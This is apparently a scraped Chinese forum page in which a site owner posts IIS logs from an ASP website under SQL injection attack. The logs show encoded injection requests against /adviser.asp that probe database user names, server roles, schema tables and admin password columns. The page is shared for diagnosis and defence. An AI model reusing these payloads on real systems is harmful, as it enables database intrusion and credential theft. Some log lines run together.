被注入病毒代码的问题

(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) 200 0 0 1468
2009-02-11 17:50:52 W3SVC53 203.169.145.67 GET /Users/UserIndex.asp Flag=1|13|80040e14|[Microsoft][ODBC_SQL_Server_Driver]
[SQL_Server]第_1_行:_'='_附近有语法错误。 80 - 66.249.67.137 Mozilla/5.0+
2009-02-11 18:14:22 W3SVC53 203.169.145.67 GET /adviser.asp Id=15 80 - 219.128.253.242 Mozilla/4.0+
(compatible;+MSIE+7.0;+Windows+NT+5.1;+iCafeMedia;+.NET+CLR+1.1.4322) 200 0 0 40163
2009-02-11 18:15:03 W3SVC53 203.169.145.67 POST /adviser.asp NewId=253 80 - 219.128.253.242 Mozilla/4.0+
(compatible;+MSIE+7.0;+Windows+NT+5.1;+iCafeMedia;+.NET+CLR+1.1.4322) 200 0 0 1519
2009-02-11 18:22:08 W3SVC53 203.169.145.67 GET /Users/UserViewNews.asp |54|80040e14|[Microsoft][ODBC_SQL_Server_Driver]
[SQL_Server]在关键字_'And'_附近有语法错误。 80 - 66.249.67.137 Mozilla/5.0+
(compatible;+Googlebot/2.1;++http://www.google.com/bot.html) 200 0 0 6750
2009-02-11 22:19:05 W3SVC53 203.169.145.67 GET /ViewGame.asp |15|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]在关
键字_'And'_附近有语法错误。 80 - 74.222.6.95 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+MyIE+3.01) 200 0 0 1015
2009-02-11 22:19:06 W3SVC53 203.169.145.67 GET /ViewGame.asp ... 80 - 74.222.6.95 Mozilla/4.0+
(compatible;+MSIE+5.01;+Windows+NT+5.0;+MyIE+3.01) 200 0 64 0
#Software: Microsoft Internet Information Services 6.0
(compatible;+MSIE+7.0;+Windows+NT+5.1;+iCafeMedia;+.NET+CLR+1.1.4322) 200 0 0 273
+;+Foxy/1;+.NET+CLR+2.0.50727) 200 0 0 405

解决方案 »

免费领取超大流量手机卡，每月29元包185G流量+100分钟通话, 中国电信官方发货

2009-02-12 01:57:01 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0)%3E0--%20and%201=1|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]不能使用空白的对象或列名。如果必要，请使用一个空格。 80 - 121.234.234.157 pangolin/0.1 200 0 0 2006
2009-02-12 01:57:27 W3SVC53 203.169.145.67 GET /adviser.asp Id=6'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20''='|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'‘'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1984
2009-02-12 01:57:27 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20char(124)%2Buser%2Bchar(124)=0|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_nvarchar_值_'|coverwinner_f|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1921
2009-02-12 01:57:27 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20%61%6E%64%20%31%3D%31 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 2048
2009-02-12 01:57:27 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20char(124)%2Bdb_name()%2Bchar(124)=0%20--|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_nvarchar_值_'|coverwinner|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1919
2009-02-12 01:57:27 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20char(124)%2Buser%2Bchar(124)=0;declare%20@d%20int;--|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_nvarchar_值_'|coverwinner_f|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1921
2009-02-12 01:57:27 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20--|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_varchar_值_'|0|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1908
2009-02-12 01:57:28 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20%61%6E%64%20%31%3D%32 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 1565
2009-02-12 01:57:28 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20%20and%20exists%20(select%20*%20from%20sysobjects)%20-- 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 2048
2009-02-12 01:57:30 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20where%20xtype=char(85)%20and%20status%20>1)>0%20%20--|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:57:34 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20where%20xtype=char(85)%20and%20status%20>1)>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:57:36 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20where%20xtype=char(85)%20and%20status%20>1)>0%20%20--|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:57:36 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[sysobjects]%20where%20xtype=char(85)%20and%20status%20>1)>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:57:52 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=1 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 2048
2009-02-12 01:57:52 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 1565
2009-02-12 01:57:52 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20exists%20(select%20*%20from%20sysobjects) 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 2048
2009-02-12 01:57:53 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20char(124)%2Buser%2Bchar(124)=0|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_nvarchar_值_'|coverwinner_f|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1921
2009-02-12 01:57:53 W3SVC53 203.169.145.67 GET /adviser.asp Id=6;declare%20@a%20int-- 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64 2048
2009-02-12 01:57:53 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20char(124)%2Bdb_name()%2Bchar(124)=0|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_nvarchar_值_'|coverwinner|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1919
2009-02-12 01:57:53 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)=1 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 1565
2009-02-12 01:57:53 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20IS_MEMBER(0x640062005F006F0077006E0065007200)=1 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 0 1565
2009-02-12 01:57:56 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20char(124)%2B(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[coverwinner]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:57:56 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20char(124)%2B(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%20from%20[coverwinner]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:58:00 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20char(124)%2B(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%20from%20[coverwinner]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 01:58:00 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20And%20char(124)%2B(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%20from%20[coverwinner]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Internet+Explorer+6.0 200 0 0 1876
2009-02-12 02:01:23 W3SVC53 203.169.145.67 GET / - 80 - 150.70.84.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0 30886
2009-02-12 02:49:08 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20information_schema.tables 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30330
2009-02-12 02:49:38 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20information_schema.tables 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30437
2009-02-12 02:51:35 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30342
2009-02-12 03:02:18 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 2009-02-12 03:09:53 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30449
2009-02-12 03:10:11 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 2009-02-12 03:10:30 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 2009-02-12 03:10:54 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30449
2009-02-12 03:10:58 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30342
2009-02-12 03:13:11 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;)+Paros/3.2.3 200 0 0 30468
2009-02-12 03:16:06 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 0 30449
2009-02-12 03:16:21 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 30449
2009-02-12 03:21:26 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727;+MAXTHON+2.0) 200 0 64 24576
2009-02-12 03:22:55 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,schema_name,5%20from%20information_schema.schemata 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 30449
2009-02-12 03:25:19 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=0x636F76657277696E6E65725F66 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1565
2009-02-12 03:25:31 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=0x636F76657277696E6E65725F66 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1565
SQL注入专题
http://topic.csdn.net/u/20081205/09/3dd06076-bcbe-45d4-998c-8999fdbe6fae.html
2009-02-12 03:25:33 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=0x636F76657277696E6E65725F66 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1565
2009-02-12 03:25:54 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=0x636F76657277696E6E65725F66 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1565
2009-02-12 03:26:18 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20admin|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'admin'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1868
2009-02-12 03:26:27 W3SVC53 203.169.145.67 GET /pic/right5.gif - 80 - 118.160.68.234 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+Foxy/1;+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)+;+Foxy/1;+.NET+CLR+2.0.50727) 200 0 64 2048
2009-02-12 03:26:27 W3SVC53 203.169.145.67 GET /pic/right4.gif - 80 - 118.160.68.234 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+Foxy/1;+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)+;+Foxy/1;+.NET+CLR+2.0.50727) 200 0 64 2048
2009-02-12 03:26:28 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20admin|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'admin'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1868
2009-02-12 03:26:36 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20adminuser|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'adminuser'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1872
2009-02-12 03:26:43 W3SVC53 203.169.145.67 GET /MarqueeBody.asp Id=173 80 - 118.160.68.234 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+Foxy/1;+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)+;+Foxy/1;+.NET+CLR+2.0.50727) 200 0 0 1106
2009-02-12 03:26:52 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20adminuser|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'adminuser'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1872
2009-02-12 03:26:53 W3SVC53 203.169.145.67 GET /pic/dot.gif - 80 - 118.160.68.234 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+Foxy/1;+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)+;+Foxy/1;+.NET+CLR+2.0.50727) 200 0 0 405
2009-02-12 03:27:02 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20adminuser|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'adminuser'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1872
2009-02-12 03:27:17 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20manage|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'manage'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1869
2009-02-12 03:29:31 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,table_name,5%20from%20information_schema.tables 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 30337
2009-02-12 03:30:15 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,4,5%20from%20Advisers 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 30330
2009-02-12 03:30:22 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,username,5%20from%20Advisers|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]列名_'username'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1869
2009-02-12 03:30:50 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,name,5%20from%20Advisers 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 30344
2009-02-12 03:31:01 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,pwd,5%20from%20Advisers|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]列名_'pwd'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1864
2009-02-12 03:31:01 W3SVC53 203.169.145.67 GET /MarqueeBody.asp Id=173 80 - 118.160.68.234 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+Foxy/1;+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)+;+Foxy/1;+.NET+CLR+2.0.50727) 200 0 0 1106
2009-02-12 03:31:07 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,password,5%20from%20Advisers|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]列名_'password'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1869
2009-02-12 03:31:15 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%201=2%20union%20select%201,2,3,userpwd,5%20from%20Advisers|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]列名_'userpwd'_无效。 80 - 121.234.234.157 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+zh-CN;+rv:1.9.0.5)+Gecko/2008120122+Firefox/3.0.5 200 0 0 1868
2009-02-12 03:32:07 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20user>0|86|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_';'_附近有语法错误。 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 1876
2009-02-12 03:32:14 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20char(124)%2Buser%2Bchar(124)=0|86|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]将_nvarchar_值_'|coverwinner_f|'_转换为数据类型为_int_的列时发生语法错误。 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 1921
2009-02-12 03:32:37 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20exists%20(select%20u_name%20from%20admin)|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'admin'_无效。 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 1868
2009-02-12 03:32:42 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20exists%20(select%20*%20from%20admin)|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'admin'_无效。 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 1868
2009-02-12 03:32:52 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20exists%20(select%20*%20from%20admin_userinfo)|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'admin_userinfo'_无效。 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 1877
2009-02-12 03:33:04 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20exists%20(select%20*%20from%20admin_psw)|86|80040e37|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]对象名_'admin_psw'_无效。 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 1872
2009-02-12 03:33:16 W3SVC53 203.169.145.67 GET /adviser.asp Id=6%20and%20exists%20(select%20*%20from%20users) 80 - 121.234.234.157 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+User-agent:+Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+http://bsalsa.com)+;+.NET+CLR+2.0.50727) 200 0 0 34975
